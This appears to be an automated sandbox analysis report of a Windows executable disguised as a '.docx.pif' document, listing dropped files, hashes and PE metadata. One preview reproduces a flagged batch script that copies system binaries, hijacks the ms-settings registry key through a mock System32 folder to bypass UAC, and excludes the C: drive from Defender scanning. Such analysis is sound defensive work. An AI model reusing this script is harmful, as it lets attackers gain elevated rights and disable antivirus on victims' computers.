                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........................................................r.........Rich............PE..d....6<..........."..........N.................@.............................p......@.....`.......... ..........................................D....P.......@..,............`..D.......T...........................0...............H...x............................text...p........................... ..`.rdata..(........0..................@..@.data...(....0......................@....pdata..,....@......................@..@.rsrc........P.......$..............@..@.reloc..D....`.......,..............@..B........................................................................................................................................................................................................................................................................

                                                                            C:\Users\Public\xkn.exe

                                                                            Download File
                                                                            Process:C:\Windows\System32\extrac32.exe
                                                                            File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                            Category:modified
                                                                            Size (bytes):452608
                                                                            Entropy (8bit):5.459268466661775
                                                                            Encrypted:false
                                                                            SSDEEP:6144:r2fdXxswSX0z/YWwO9sV1yZywi/PzNKXzJ7BapCK5d3klRzULOnWyjLsPhAQzqO:qVXqXEgW2KXzJ4pdd3klnnWosPhnzq
                                                                            MD5:04029E121A0CFA5991749937DD22A1D9
                                                                            SHA1:F43D9BB316E30AE1A3494AC5B0624F6BEA1BF054
                                                                            SHA-256:9F914D42706FE215501044ACD85A32D58AAEF1419D404FDDFA5D3B48F66CCD9F
                                                                            SHA-512:6A2FB055473033FD8FDB8868823442875B5B60C115031AAEDA688A35A092F6278E8687E2AE2B8DC097F8F3F35D23959757BF0C408274A2EF5F40DDFA4B5C851B
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            • Antivirus: Virustotal, Detection: 0%, Browse
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......./..%k.ovk.ovk.ovu..vi.ovb..va.ov..lwi.ov..kwq.ovk.nv.ov..nwn.ov..jwb.ov..bwb.ov..vj.ov..mwj.ovRichk.ov........................PE..d....A.~.........."..........^......@=.........@..........................................`.......... .......................................L...........}...p..........................T......................(..................`................................text............................... ..`.rdata.............................@..@.data...,....`.......L..............@....pdata.......p.......T..............@..@.rsrc....}.......~...^..............@..@.reloc..............................@..B................................................................................................................................................................................................................................................

                                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\xkn.exe.log

                                                                            Download File
                                                                            Process:C:\Users\Public\xkn.exe
                                                                            File Type:CSV text
                                                                            Category:dropped
                                                                            Size (bytes):2667
                                                                            Entropy (8bit):5.3546132390144345
                                                                            Encrypted:false
                                                                            SSDEEP:48:MxHKQwYHKGSI6o6+ztYsTzHNpDHmAHKKkWHKmHKe6ftHTHq+0trK7mHKwl9:iqbYqGSI6o9xYsntpDxqKkWqmq1ftzHK
                                                                            MD5:A477C52686412872F51E6EADC0EE00E8
                                                                            SHA1:97AF03D2CD45488E73DCB72720F6EB704DB687B6
                                                                            SHA-256:9478FEA68BD400729D6132BC0D47527BE473E45F64C17C4568F655C188EA3C6A
                                                                            SHA-512:BF00A82630532385C5A9E1C7B2B95C6E09AB671E8D59A9129837A763F9A44C654ACE578F15F27A4FEF1CB01A800FAB850A6FAD85272ABB26EFA87442F320A52A
                                                                            Malicious:false
                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.PowerShell.ConsoleHost, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pb378ec07#\0827b790b8e74d0d12643297a812ae07\Microsoft.PowerShell.ConsoleHost.ni.dll",0..3,"System.Management.Automation, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\27947b366dfb4feddb2be787d72ca90d\System.Management.Automation.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d5

                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                            Download File
                                                                            Process:C:\Users\Public\xkn.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):64
                                                                            Entropy (8bit):0.773832331134527
                                                                            Encrypted:false
                                                                            SSDEEP:3:Nlllulo:NllU
                                                                            MD5:1868BD5DBAA1C3487BECA84BADCA4326
                                                                            SHA1:CE9229CBD2D84DB536C9BF4CC56A7765433AA956
                                                                            SHA-256:014955686776BC8F3512DD1E80A35170C73556A679B8AC33567FEAEB5D11AC70
                                                                            SHA-512:A4DE3F82BBD3113F2283E84991442881AC4129273063F81E2FF506051505CC647782FCF609E7B3BDAA8D0E5A8F13852D3637FF78D590467903E54E87E9085450
                                                                            Malicious:false
                                                                            Preview:@...e.................................~.........................

                                                                            C:\Users\user\AppData\Local\Temp\D2F6.tmp\D2F7.tmp\D2F8.bat

                                                                            Download File
                                                                            Process:C:\Users\Public\Libraries\drbdmeyP.pif
                                                                            File Type:ASCII text, with very long lines (324), with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):1827
                                                                            Entropy (8bit):4.970079351882489
                                                                            Encrypted:false
                                                                            SSDEEP:48:zBrqus6bgc8gKLPgH312hwa2/7yIO15dUHQTgGWBnl:9uus6b/8hLPU12hToyIA5dUH0jWBl
                                                                            MD5:E62F427202D3E5A3BA60EBE78567918C
                                                                            SHA1:6EF0CD5BA6C871815FCEB27FF095A7931452B334
                                                                            SHA-256:06BEE225A830EA0E67B91FD7D24280C5315EF82049B25B07C9CFDE4E36A639FF
                                                                            SHA-512:E15148BA4099F3B8C73319BE32A5F76226D21E7FB90123BEC68E5106D03B7D3E8AF8CAA0421667920967E8921787BA255DC4BF23D35792BF8E9A20F1E18283C6
                                                                            Malicious:true
                                                                            Preview:@shift /0..@echo off..C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe" >nul 2>nul &..C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows " >nul 2>nul &..C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows \System32" >nul 2>nul &..C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe" >nul 2>nul &..C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe" >nul 2>nul &..C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe" >nul 2>nul &..C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; " >nul 2>nul &..

                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ieogscvd.21l.psm1

                                                                            Download File
                                                                            Process:C:\Users\Public\xkn.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_txw30cbq.i2f.ps1

                                                                            Download File
                                                                            Process:C:\Users\Public\xkn.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                            C:\Windows \System32\per.exe

                                                                            Download File
                                                                            Process:C:\Windows\System32\extrac32.exe
                                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                            Category:modified
                                                                            Size (bytes):49664
                                                                            Entropy (8bit):5.876977574715819
                                                                            Encrypted:false
                                                                            SSDEEP:768:WwU7bDT2KLt6oPjQQ5fxGIjN44MgZkD9TpiPogpUORaNpohsySZlv7:WtfT2KwoPBxjN4zDbgpUOoo1SZ17
                                                                            MD5:85018BE1FD913656BC9FF541F017EACD
                                                                            SHA1:26D7407931B713E0F0FA8B872FEECDB3CF49065A
                                                                            SHA-256:C546E05D705FFDD5E1E18D40E2E7397F186A7C47FA5FC21F234222D057227CF5
                                                                            SHA-512:3E5903CF18386951C015AE23DD68A112B2F4B0968212323218C49F8413B6D508283CC6AAA929DBEAD853BD100ADC18BF497479963DAD42DFAFBEB081C9035459
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 3%
                                                                            • Antivirus: Virustotal, Detection: 0%, Browse
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......y.-.=.C.=.C.=.C.4...#.C.).F.<.C.).@.?.C.).G.).C.).B.6.C.=.B.O.C.).K.;.C.)..<.C.).A.<.C.Rich=.C.........................PE..d....*}..........."..........D......`..........@............................. ....................... ..........................................h...............X.......................T........................... ...............8................................text.............................. ..`.imrsiv..................................rdata..2&.......(..................@..@.data...............................@....pdata..X...........................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................

                                                                            \Device\Null

                                                                            Download File
                                                                            Process:C:\Users\Public\ger.exe
                                                                            File Type:ASCII text, with CRLF, CR line terminators
                                                                            Category:dropped
                                                                            Size (bytes):40
                                                                            Entropy (8bit):4.237326145256008
                                                                            Encrypted:false
                                                                            SSDEEP:3:bqX4LxGT82AGN8cyn:bqX4E8NGN8Rn
                                                                            MD5:13015015DD907D28996153DF14881252
                                                                            SHA1:532C595BAAE0A027D02D1B28D7B83D57350A310E
                                                                            SHA-256:4499283166530CE395CBC12677FEF2BD52759EACDCC5BDDE56C039B1A2E99C0B
                                                                            SHA-512:B81FB62AB27E7722BFCB386766FFA1D1EBA05B8B03CD5D2160BB2570F87568381D923AC75017D785E1DEC1685769023727F4280E27C2A69CDE69772CA62E2A92
                                                                            Malicious:false
                                                                            Preview:The operation completed successfully....

                                                                            Static File Info

                                                                            General

                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                            Entropy (8bit):6.781096986708226
                                                                            TrID:
                                                                            • Win32 Executable (generic) a (10002005/4) 99.81%
                                                                            • Windows Screen Saver (13104/52) 0.13%
                                                                            • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                            File name:#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe
                                                                            File size:1'085'440 bytes
                                                                            MD5:b9da5a47e1e68ef90c075dc14f8e2037
                                                                            SHA1:4ae96232817bf7b3919aa298efc7c0d18649ed9d
                                                                            SHA256:8dbccd1c7bdb8da3a34c2a4ac5c62fb6774ce2abac29caf899039d19a5d27555
                                                                            SHA512:649f021b95b4616ef7f74573f22231e4c9f27bf840ea2cbd13b588698579d4d87fda2db521a04ff434e76e928bbfb940af4547c85f7b578f9585b92902a08f68
                                                                            SSDEEP:24576:YgjfgAhthN1aH674weG2Xiou9TBeWyKvBeI+T68sjjX:YUtNCGTBXyKv8vT6r
                                                                            TLSH:FF357D122140143BCB7377F98B86D6D8B42DED1D1618786E6A973B8B0AF7270F8E505E
                                                                            File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                                                                            File Icon

                                                                            Icon Hash:6c33333333034c70

                                                                            Static PE Info

                                                                            General

                                                                            Entrypoint:0x461490
                                                                            Entrypoint Section:.itext
                                                                            Digitally signed:false
                                                                            Imagebase:0x400000
                                                                            Subsystem:windows gui
                                                                            Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                            DLL Characteristics:
                                                                            Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                            TLS Callbacks:
                                                                            CLR (.Net) Version:
                                                                            OS Version Major:4
                                                                            OS Version Minor:0
                                                                            File Version Major:4
                                                                            File Version Minor:0
                                                                            Subsystem Version Major:4
                                                                            Subsystem Version Minor:0
                                                                            Import Hash:7873f1cee87f668ad79181f1c1cd8f07

                                                                            Entrypoint Preview

                                                                            Instruction
                                                                            push ebp
                                                                            mov ebp, esp
                                                                            add esp, FFFFFFF0h
                                                                            mov eax, 0045DAACh
                                                                            call 00007F51F8668BC5h
                                                                            mov eax, dword ptr [004CCCB8h]
                                                                            mov eax, dword ptr [eax]
                                                                            call 00007F51F86BAC55h
                                                                            mov eax, dword ptr [004CCCB8h]
                                                                            mov eax, dword ptr [eax]
                                                                            mov edx, 004614F0h
                                                                            call 00007F51F86BA6DCh
                                                                            mov ecx, dword ptr [004CCBE0h]
                                                                            mov eax, dword ptr [004CCCB8h]
                                                                            mov eax, dword ptr [eax]
                                                                            mov edx, dword ptr [0045D1D4h]
                                                                            call 00007F51F86BAC44h
                                                                            mov eax, dword ptr [004CCCB8h]
                                                                            mov eax, dword ptr [eax]
                                                                            call 00007F51F86BACB8h
                                                                            call 00007F51F8666A43h
                                                                            add byte ptr [eax], al

                                                                            Data Directories

                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0xd10000x2656.idata
                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xdd0000x33e00.rsrc
                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0xd60000x6e90.reloc
                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_TLS0xd50000x18.rdata
                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_IAT0xd17380x5f8.idata
                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                            Sections

                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                            .text0x10000x5ccfc0x5ce00ec0b073cb39ded0e2389db541ea26c95False0.525167185397039data6.5435496200376555IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                            .itext0x5e0000x35080x360046619a1a2848b1dee5a102aa4901d57aFalse0.3472222222222222data5.513007867449675IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                            .data0x620000x6ae580x6b0002bae7df7f59a3315aaa996408829b936False0.5081045560747663data6.500873269343917IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                            .bss0xcd0000x36d00x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                            .idata0xd10000x26560x2800eb0b41497509e4cb032aaabec5b8d5c5False0.31220703125data5.073460051819435IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                            .tls0xd40000x340x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                            .rdata0xd50000x180x200389cffe8a4e7b2fdb439e2e9d918a025False0.05078125data0.2108262677871819IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                            .reloc0xd60000x6e900x7000b338a9383541a38b75a372e3f419e93fFalse0.6334402901785714data6.675439498395376IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                            .rsrc0xdd0000x33e000x33e00687c4b488cbb2e53b54ede465714b165False0.1153379141566265data4.711864521160899IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                            Resources

                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                            RT_CURSOR0xddc0c0x134Targa image data - Map 64 x 65536 x 1 +32 "\001"EnglishUnited States0.38636363636363635
                                                                            RT_CURSOR0xddd400x134dataEnglishUnited States0.4642857142857143
                                                                            RT_CURSOR0xdde740x134dataEnglishUnited States0.4805194805194805
                                                                            RT_CURSOR0xddfa80x134dataEnglishUnited States0.38311688311688313
                                                                            RT_CURSOR0xde0dc0x134dataEnglishUnited States0.36038961038961037
                                                                            RT_CURSOR0xde2100x134dataEnglishUnited States0.4090909090909091
                                                                            RT_CURSOR0xde3440x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"EnglishUnited States0.4967532467532468
                                                                            RT_BITMAP0xde4780x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.43103448275862066
                                                                            RT_BITMAP0xde6480x1e4Device independent bitmap graphic, 36 x 19 x 4, image size 380EnglishUnited States0.46487603305785125
                                                                            RT_BITMAP0xde82c0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.43103448275862066
                                                                            RT_BITMAP0xde9fc0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39870689655172414
                                                                            RT_BITMAP0xdebcc0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.4245689655172414
                                                                            RT_BITMAP0xded9c0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5021551724137931
                                                                            RT_BITMAP0xdef6c0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5064655172413793
                                                                            RT_BITMAP0xdf13c0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39655172413793105
                                                                            RT_BITMAP0xdf30c0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5344827586206896
                                                                            RT_BITMAP0xdf4dc0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39655172413793105
                                                                            RT_BITMAP0xdf6ac0xe8Device independent bitmap graphic, 16 x 16 x 4, image size 128EnglishUnited States0.4870689655172414
                                                                            RT_ICON0xdf7940x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 32251 x 32251 px/m0.5203900709219859
                                                                            RT_ICON0xdfbfc0x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304, resolution 32251 x 32251 px/m0.3831967213114754
                                                                            RT_ICON0xe05840x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 32251 x 32251 px/m0.28283302063789867
                                                                            RT_ICON0xe162c0x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 32251 x 32251 px/m0.1725103734439834
                                                                            RT_ICON0xe3bd40x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16384, resolution 32251 x 32251 px/m0.12086679263108172
                                                                            RT_ICON0xe7dfc0x5488Device independent bitmap graphic, 72 x 144 x 32, image size 20736, resolution 32251 x 32251 px/m0.10378927911275417
                                                                            RT_ICON0xed2840x67e8Device independent bitmap graphic, 80 x 160 x 32, image size 25600, resolution 32251 x 32251 px/m0.07567669172932331
                                                                            RT_ICON0xf3a6c0x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 36864, resolution 32251 x 32251 px/m0.0758618877443767
                                                                            RT_ICON0xfcf140x10828Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 32251 x 32251 px/m0.05842600260262629
                                                                            RT_DIALOG0x10d73c0x52data0.7682926829268293
                                                                            RT_DIALOG0x10d7900x52data0.7560975609756098
                                                                            RT_STRING0x10d7e40x238data0.47183098591549294
                                                                            RT_STRING0x10da1c0x2b0data0.4752906976744186
                                                                            RT_STRING0x10dccc0xb8data0.6793478260869565
                                                                            RT_STRING0x10dd840xecdata0.6398305084745762
                                                                            RT_STRING0x10de700x2f0data0.4587765957446808
                                                                            RT_STRING0x10e1600x3d0data0.38729508196721313
                                                                            RT_STRING0x10e5300x370data0.4022727272727273
                                                                            RT_STRING0x10e8a00x3ccdata0.33539094650205764
                                                                            RT_STRING0x10ec6c0x214data0.49624060150375937
                                                                            RT_STRING0x10ee800xccdata0.6274509803921569
                                                                            RT_STRING0x10ef4c0x194data0.5643564356435643
                                                                            RT_STRING0x10f0e00x3c4data0.3288381742738589
                                                                            RT_STRING0x10f4a40x338data0.42961165048543687
                                                                            RT_STRING0x10f7dc0x294data0.42424242424242425
                                                                            RT_RCDATA0x10fa700x10data1.5
                                                                            RT_RCDATA0x10fa800x2f4data0.7182539682539683
                                                                            RT_RCDATA0x10fd740xe8aDelphi compiled form 'TFrmMain'0.2729715206878023
                                                                            RT_GROUP_CURSOR0x110c000x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                            RT_GROUP_CURSOR0x110c140x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                            RT_GROUP_CURSOR0x110c280x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                            RT_GROUP_CURSOR0x110c3c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                            RT_GROUP_CURSOR0x110c500x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                            RT_GROUP_CURSOR0x110c640x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                            RT_GROUP_CURSOR0x110c780x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                            RT_GROUP_ICON0x110c8c0x84data0.75

                                                                            Imports

                                                                            DLLImport
                                                                            oleaut32.dllSysFreeString, SysReAllocStringLen, SysAllocStringLen
                                                                            advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
                                                                            user32.dllGetKeyboardType, DestroyWindow, LoadStringA, MessageBoxA, CharNextA
                                                                            kernel32.dllGetACP, Sleep, VirtualFree, VirtualAlloc, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, CompareStringA, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
                                                                            kernel32.dllTlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
                                                                            user32.dllCreateWindowExA, WindowFromPoint, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, SetWindowsHookExA, SetWindowTextA, SetWindowPos, SetWindowPlacement, SetWindowLongW, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageW, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageW, PeekMessageA, OffsetRect, OemToCharA, MessageBoxA, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageW, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongW, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMessagePos, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameA, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClientRect, GetClassLongA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EnumChildWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawEdge, DispatchMessageW, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
                                                                            gdi32.dllUnrealizeObject, StretchBlt, SetWindowOrgEx, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, RectVisible, RealizePalette, Polyline, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectA, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, ExcludeClipRect, DeleteObject, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, BitBlt
                                                                            version.dllVerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
                                                                            kernel32.dlllstrcpyA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualAlloc, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MultiByteToWideChar, MulDiv, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalFindAtomA, GlobalDeleteAtom, GlobalAddAtomA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetStdHandle, GetProcAddress, GetModuleHandleW, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetComputerNameA, GetCPInfo, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, EnumDateFormatsW, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
                                                                            advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegFlushKey, RegCloseKey
                                                                            oleaut32.dllGetErrorInfo, GetActiveObject, SysFreeString
